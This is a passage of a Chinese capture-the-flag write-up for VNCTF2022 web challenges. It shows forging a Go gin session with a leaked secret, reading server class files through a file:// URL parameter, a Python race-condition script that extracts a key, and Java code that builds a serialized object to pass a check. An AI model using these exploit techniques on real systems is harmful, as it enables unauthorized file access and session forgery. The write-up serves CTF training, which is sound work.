render(c) }) r.GET("/flag", func(c *gin.Context) { session := sessions.Default(c) session.Set("FLAG", os.Getenv("FLAG")) session.Save() c.String(200, "flag is in your session") }) r.POST("/", func(c *gin.Context) { session := sessions.Default(c)var his stringif session.Get("history") == nil { his = "" } else { his = session.Get("history").(string) }eval := Eval{} if err := c.ShouldBind(&eval); err == nil { his = his + eval.String() + "
" } session.Set("history", his) session.Save() render(c) }) r.Run(fmt.Sprintf(":%s", port)) }

这里就很明显的泄露了这个store变量：cookie.NewStore([]byte("woW_you-g0t_sourcE_co6e"))
把flag路由给截取出来

package mainimport ( _ "embed" "fmt" "os" "github.com/gin-contrib/sessions" "github.com/gin-contrib/sessions/cookie" "github.com/gin-gonic/gin" )func main() { port := os.Getenv("PORT") if port == "" { port = "8888" } r := gin.Default() store := cookie.NewStore([]byte("woW_you-g0t_sourcE_co6e")) r.Use(sessions.Sessions("session", store)) r.GET("/flag", func(c *gin.Context) { session := sessions.Default(c) c.String(200, session.Get("FLAG").(string)) }) r.Run(fmt.Sprintf(":%s", port)) }

【比赛wp|[VNCTF2022]部分wp】跑起来

文章图片

把session给带进cookie里面，发包访问flag路由

文章图片

成功拿到flag
easyJava 注释了file路由，有一个url参数，任意文件读取

文章图片

直接读取classes目录

file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes

文章图片

把servlet目录的东西弄出来

file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes/servlet/HelloWorldServlet.class

HelloWorldServlet

// // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) //package servlet; import entity.User; import java.io.IOException; import java.util.Base64; import java.util.Base64.Decoder; import javax.servlet.ServletException; import javax.servlet.ServletOutputStream; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import util.Secr3t; import util.SerAndDe; @WebServlet( name = "HelloServlet", urlPatterns = {"/evi1"} ) public class HelloWorldServlet extends HttpServlet { private volatile String name = "m4n_q1u_666"; private volatile String age = "666"; private volatile String height = "180"; User user; public HelloWorldServlet() { }public void init() throws ServletException { this.user = new User(this.name, this.age, this.height); }protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String reqName = req.getParameter("name"); if (reqName != null) { this.name = reqName; }if (Secr3t.check(this.name)) { this.Response(resp, "no vnctf2022!"); } else { if (Secr3t.check(this.name)) { this.Response(resp, "The Key is " + Secr3t.getKey()); }} }protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String key = req.getParameter("key"); String text = req.getParameter("base64"); if (Secr3t.getKey().equals(key) && text != null) { Decoder decoder = Base64.getDecoder(); byte[] textByte = decoder.decode(text); User u = (User)SerAndDe.deserialize(textByte); if (this.user.equals(u)) { this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString()); } } else { this.Response(resp, "KeyError"); }}private void Response(HttpServletResponse resp, String outStr) throws IOException { ServletOutputStream out = resp.getOutputStream(); out.write(outStr.getBytes()); out.flush(); out.close(); } }

FileServlet.class

// // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) //package servlet; import java.io.IOException; import java.io.InputStream; import javax.servlet.ServletException; import javax.servlet.ServletOutputStream; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.tomcat.util.http.fileupload.IOUtils; import util.UrlUtil; @WebServlet( name = "FileServlet", urlPatterns = {"/file"} ) public class FileServlet extends HttpServlet { public FileServlet() { }protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String url = req.getParameter("url"); if (url != null) { InputStream responseContent = null; try { responseContent = UrlUtil.visit(url); IOUtils.copy(responseContent, resp.getOutputStream()); resp.flushBuffer(); } catch (Exception var9) { var9.printStackTrace(); } finally { responseContent.close(); } } else { this.Response(resp, "please input a url"); }}private void Response(HttpServletResponse resp, String outStr) throws IOException { ServletOutputStream out = resp.getOutputStream(); out.write(outStr.getBytes()); out.flush(); out.close(); } }

再看util的
有个很明显的Secr3t.class

// // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) //package util; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import org.apache.commons.lang3.RandomStringUtils; public class Secr3t { private static final String Key = RandomStringUtils.randomAlphanumeric(32); private static StringBuffer Flag; private Secr3t() { }public static String getKey() { return Key; }public static StringBuffer getFlag() { Flag = new StringBuffer(); InputStream in = null; try { in = Runtime.getRuntime().exec("/readflag").getInputStream(); } catch (IOException var12) { var12.printStackTrace(); }BufferedReader read = new BufferedReader(new InputStreamReader(in)); try { String line = null; while((line = read.readLine()) != null) { Flag.append(line + "\n"); } } catch (IOException var13) { var13.printStackTrace(); } finally { try { in.close(); read.close(); } catch (IOException var11) { var11.printStackTrace(); System.out.println("Secr3t : io exception!"); }}return Flag; }public static boolean check(String checkStr) { return "vnctf2022".equals(checkStr); } }

先看到hello的代码，看这里的判断条件，要满足这个条件，就会给出flag

protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String key = req.getParameter("key"); String text = req.getParameter("base64"); if (Secr3t.getKey().equals(key) && text != null) { Decoder decoder = Base64.getDecoder(); byte[] textByte = decoder.decode(text); User u = (User)SerAndDe.deserialize(textByte); if (this.user.equals(u)) { this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString()); } } else { this.Response(resp, "KeyError"); }}

首先是要得到Secr3t.getKey()，这个key是由这个得到的

private static final String Key = RandomStringUtils.randomAlphanumeric(32);

然后再反序列化text的数据

User u = (User)SerAndDe.deserialize(textByte);

所以我们的第一步就是先拿到key，而获取key的方法在这里

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String reqName = req.getParameter("name"); if (reqName != null) { this.name = reqName; }if (Secr3t.check(this.name)) { this.Response(resp, "no vnctf2022!"); } else { if (Secr3t.check(this.name)) { this.Response(resp, "The Key is " + Secr3t.getKey()); }} }

要满足if (Secr3t.check(this.name))，但是这里的两个判断是矛盾的，如果我们要进入第二个判断，那么就要进行条件竞争
再看看check方法

public static boolean check(String checkStr) { return "vnctf2022".equals(checkStr); }

所以我们可以写出如下脚本（不知道为啥我的多线程没跑出来，用了一下网上师傅们的脚本）

# -*- coding: UTF-8 -*- import requests import threading host = "xxxx"``class myThread (threading.Thread): def __init__(self, name): threading.Thread.__init__(self) self.name = name def run(self): print ("开始线程：" + self.name) runing(self.name) print ("退出线程：" + self.name)def runing(name): while True: r = requests.get(host+"/evi1?name=%s" % name) r.encoding = "utf-8" if r.text.find("The Key is")!=-1: print(r.text) return 0# 创建新线程 thread1 = myThread("asdqwer") thread2 = myThread("vnctf2022")# 开启新线程 thread1.start() thread2.start() thread1.join() thread2.join()

The Key is IzaQ5XP4gXTB6ezLn1EpEImMM10icEPm

文章图片

再构造序列化对象

import entity.User; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; import java.util.Base64; import util.SerAndDe; public class Ser { public static void main(String[] args) throws IOException { User user = new User("m4n_q1u_666","666","180"); ByteArrayOutputStream bos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(bos); oos.writeObject(user); byte[] ser = bos.toByteArray(); Base64.Encoder encoder = Base64.getEncoder(); String encodedText = encoder.encodeToString(ser); System.out.println(encodedText); User user2 = (User) SerAndDe.deserialize(ser); System.out.println(user2); } }

User里面写好writeObject

private void writeObject(java.io.ObjectOutputStream out) throws IOException { out.defaultWriteObject(); out.writeObject(this.height); }

文章图片

发包拿到flag

文章图片

推荐阅读

• 

  婕珞芙晨露蔷薇面膜怎么样 婕路芙晨露蔷薇面膜可以分两次用吗
• 

  猪肉各部位的区别 猪肉哪个部位是一等肉
• 

  最早指南车发明人 指南车发明者
• 

  银天下行情分析系统软件下载
• 

  redis跳跃表查找数据的过程 redis哪块用到跳表
• 

  华为荣耀play3有没有指纹解锁（华为荣耀play3有指纹解锁吗）
• 

  amdk15支持什么cpu，amdk15主板支持的cpu
• 

  女性揉地筋的好处 主要有这些好处
• 

  汽车原厂互联映射什么意思
• 

  常年不在家冰箱怎么办？如何维护和保养？
• 

  怎样识别变频空调和定频空调 空调开一天多少钱
• 

  七绝（云水一梦惹东风）
• 

  新办企业个税申报密码 申报个税在哪个软件，企业个税能用手机申报吗
• 

  运动会通讯稿300字
• 

  美的SC861A吸尘器不充电的解决方法
• 

  刘海屏|iPhone 14强势曝光：是不是后悔手里的iPhone 13买早了？
• 

  iphone|从12999元跌至10488元，12G+512G，华为顶级旗舰现货供应不用抢购
• 

  绝地求生刺激战场国际服 绝地求生刺激战场国际服下载方法有哪些
• 

  无症状感染者会一直不发病吗
• 

  泰顺云雾茶是什么茶 泰顺雾云农庄

• 比赛wp|[SCTF2021]Upload_it_1复现闭包组件反序列化rce
• 比赛wp|[HWS&DasCTF]misc
• 代码审计|[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析
• 代码审计|[代码审计]yii2 反序列化漏洞分析
• 程序人生|外包干了五年，废了...
• 数据库|TiDB Online DDL 在 TiCDC 中的应用丨TiDB 工具分享
• Java|几种常见的注册中心以及区别
• 大数据|最全的产品经理分类
• 前端|面试官（为什么Vue中的v-if和v-for不建议一起用）